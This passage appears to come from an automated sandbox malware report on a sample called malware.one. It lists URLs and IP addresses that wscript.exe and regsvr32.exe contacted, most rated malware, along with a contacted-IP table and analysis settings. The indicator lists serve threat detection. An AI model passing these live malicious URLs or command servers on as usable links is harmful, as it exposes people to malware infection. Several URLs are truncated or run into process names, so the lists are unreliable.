0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392433354.0000000003324000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/regsvr32.exe, 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000F.00000002.572181479.0000000000762000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://218.38.121.17/tcbvserkm/kigv/rbwmds/T(regsvr32.exe, 0000000F.00000002.572181479.00000000007C3000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://4fly.su:443/search/OfGA/wMwscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://thailandcan.org/assets/ulRa/Pwscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388916629.00000000058A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394717076.00000000058AB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/vMwscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://218.38.121.17/tcbvserkm/kigv/rbwmds/wnregsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/6wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://115.178.55.22:80/regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://1it.fitwscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389268464.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394733751.00000000058D2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://115.178.55.22:80/tcbvserkm/kigv/rbwmds/regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://93.84.115.205:7080/Tregsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://olgaperezporro.com/wscript.exe, 0000000A.00000003.375930591.0000000005A12000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393332313.0000000005A5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.395019547.0000000005A20000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://115.178.55.22:80/lregsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://uk-eurodom.com/bitrix/9HrzPY66D1F/wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394765226.0000000005917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://olgaperezporro.comwscript.exe, 0000000A.00000003.392888867.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392584081.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394237064.0000000004FD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392354536.0000000004FB4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392777257.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392625530.0000000004FBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392754360.0000000004FC8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.392789218.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://efirma.sgwscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389268464.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394733751.00000000058D2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.polarkh-crewing.com/aboutuwscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382444301.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386310650.00000000055A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382820492.00000000055A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394355887.00000000055AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383863308.00000000055A3000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://198.38.121.17/regsvr32.exe, 0000000F.00000002.572181479.000000000073C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://malli.s4wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://olgaperezporro.com/js/ExGBiCZdkkw0GBAuHNZ/esquwscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://kts.group/35ccbf2003/jKgk8/uMwscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://138.197.14.67:8080/tcbvserkm/kigv/rbwmds/aregsvr32.exe, 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://staging-demo.com/public_html/wTG/xMwscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            https://4fly.su:443/search/OfGA/wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381734544.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380726054.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054BF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389552765.00000000058D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381193898.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381071407.0000000005518000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380565209.00000000054D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384344893.000000000569B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.0000000005498000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385194824.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393045342.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380087000.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385805896.000000000575C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.378645005.0000000002DF1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394765226.0000000005917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382922576.000000000564F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381734544.0000000005502000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.391066699.00000000059A5000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://semedacara.com.br/ava/ahhz/yMwscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/8wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://4fly.su:443/search/OfGA/atawscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.00000000053A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380055179.00000000053A3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379248511.0000000005397000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394303780.00000000053A9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://kts.groupwscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://staging-demo.com/public_html/wTwscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            		unknown
                            http://hypernite.5v.pl/vendor/hvlVMsI9jGafBBTa/zMwscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://efirma.sglwebs.com/img/2mmLuvwscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://thailandcan.org/assets/ulRa/wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394765226.0000000005917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://218.38.121.17/regsvr32.exe, 0000000F.00000002.572181479.0000000000788000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://hypernite.5v.pl/vendowscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://malli.su:80/img/PXN5J/tMwscript.exe, 0000000A.00000003.392112546.0000000004FDB000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://uk-eurodom.com/bitrix/9HrzPY66D1F/24Qwscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381439650.000000000557E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.000000000558C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394341142.000000000558C000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://semedacara.com.br/ava/awscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394701314.00000000058A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://138.197.14.67:8080/regsvr32.exe, 0000000F.00000002.572181479.00000000006EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://hypernite.5v.pl/vendor/hvlVMsI9jGafBBTa/cw1122wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.386373392.0000000005794000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.385630751.000000000578C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387429953.00000000057B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394545937.00000000057CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387506954.00000000057C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://1it.fit/site_vp/4PwK3s6Bf9K7TEA/EC24%wscript.exe, 0000000A.00000003.381296278.0000000005577000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381439650.000000000557E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.000000000558C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.394341142.000000000558C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://efirma.sglwebs.com/img/2mmLuv7SxhhYFRVn/wscript.exe, wscript.exe, 0000000A.00000002.394746955.00000000058EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379175657.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388681276.00000000055AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388352589.00000000057EE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.384898008.000000000561F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.382616382.0000000005541000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.387365837.000000000579E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.389287393.0000000005904000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379710983.0000000005345000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381147538.0000000005534000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.383882868.000000000566D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388670695.000000000576D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.393765942.00000000056CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380261353.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379756871.0000000005359000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.376996553.0000000002DB5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.379986129.00000000053BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.381405615.0000000005558000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.388829355.000000000589B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.380405706.000000000545A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  193.194.92.175
                                  		unknownAlgeria
                                  		3208ARNDZtrue
                                  93.84.115.205
                                  		unknownBelarus
                                  		6697BELPAK-ASBELPAKBYtrue
                                  174.138.33.49
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  160.16.143.191
                                  		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                  103.41.204.169
                                  		unknownIndonesia
                                  		58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                                  85.214.67.203
                                  		unknownGermany
                                  		6724STRATOSTRATOAGDEtrue
                                  83.229.80.93
                                  		unknownUnited Kingdom
                                  		8513SKYVISIONGBtrue
                                  85.25.120.45
                                  		unknownGermany
                                  		8972GD-EMEA-DC-SXB1DEtrue
                                  198.199.70.22
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  159.65.135.222
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  93.104.209.107
                                  		unknownGermany
                                  		8767MNET-ASGermanyDEtrue
                                  186.250.48.5
                                  		unknownBrazil
                                  		262807RedfoxTelecomunicacoesLtdaBRtrue
                                  209.239.112.82
                                  		unknownUnited States
                                  		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                  175.126.176.79
                                  		unknownKorea Republic of
                                  		9523MOKWON-AS-KRMokwonUniversityKRtrue
                                  37.59.103.148
                                  		unknownFrance
                                  		16276OVHFRtrue
                                  138.197.14.67
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  139.196.72.155
                                  		unknownChina
                                  		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                  128.199.242.164
                                  		unknownUnited Kingdom
                                  		14061DIGITALOCEAN-ASNUStrue
                                  115.178.55.22
                                  		unknownIndonesia
                                  		38783SIMAYA-AS-IDPTSimayaJejaringMandiriIDtrue
                                  178.238.225.252
                                  		unknownGermany
                                  		51167CONTABODEtrue
                                  128.199.217.206
                                  		unknownUnited Kingdom
                                  		14061DIGITALOCEAN-ASNUStrue
                                  46.101.98.60
                                  		unknownNetherlands
                                  		14061DIGITALOCEAN-ASNUStrue
                                  82.98.180.154
                                  		unknownSpain
                                  		42612DINAHOSTING-ASEStrue
                                  114.79.130.68
                                  		unknownIndia
                                  		45769DVOIS-IND-VoisBroadbandPvtLtdINtrue
                                  195.2.88.86
                                  		malli.suRussian Federation
                                  		6903ZENON-ASMoscowRussiaRUtrue
                                  103.224.241.74
                                  		unknownIndia
                                  		133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                                  31.31.196.93
                                  		kts.groupRussian Federation
                                  		197695AS-REGRUtrue
                                  202.28.34.99
                                  		unknownThailand
                                  		9562MSU-TH-APMahasarakhamUniversityTHtrue
                                  87.106.97.83
                                  		unknownGermany
                                  		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                  103.254.12.236
                                  		unknownViet Nam
                                  		56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                                  103.85.95.4
                                  		unknownIndonesia
                                  		136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                                  40.115.116.248
                                  		olgaperezporro.comUnited States
                                  		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                  54.37.228.122
                                  		unknownFrance
                                  		16276OVHFRtrue
                                  218.38.121.17
                                  		unknownKorea Republic of
                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                  185.148.169.10
                                  		unknownGermany
                                  		44780EVERSCALE-ASDEtrue
                                  195.77.239.39
                                  		unknownSpain
                                  		60493FICOSA-ASEStrue
                                  78.47.204.80
                                  		unknownGermany
                                  		24940HETZNER-ASDEtrue
                                  139.59.80.108
                                  		unknownSingapore
                                  		14061DIGITALOCEAN-ASNUStrue
                                  37.44.244.177
                                  		unknownGermany
                                  		47583AS-HOSTINGERLTtrue
                                  178.62.112.199
                                  		unknownEuropean Union
                                  		14061DIGITALOCEAN-ASNUStrue
                                  104.244.79.94
                                  		unknownUnited States
                                  		53667PONYNETUStrue
                                  62.171.178.147
                                  		unknownUnited Kingdom
                                  		51167CONTABODEtrue
                                  64.227.55.231
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue

                                  General Information

                                  Joe Sandbox Version:37.0.0 Beryl
                                  Analysis ID:830538
                                  Start date and time:2023-03-20 13:32:10 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 9m 34s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:21
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:malware.one
                                  (renamed file extension from malware to one, renamed because original name is a hash value)
                                  Original Sample Name:malware.malware
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winONE@12/696@3/43
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HDC Information:
                                  • Successful, ratio: 85.9% (good quality ratio 79.1%)
                                  • Quality average: 77.4%
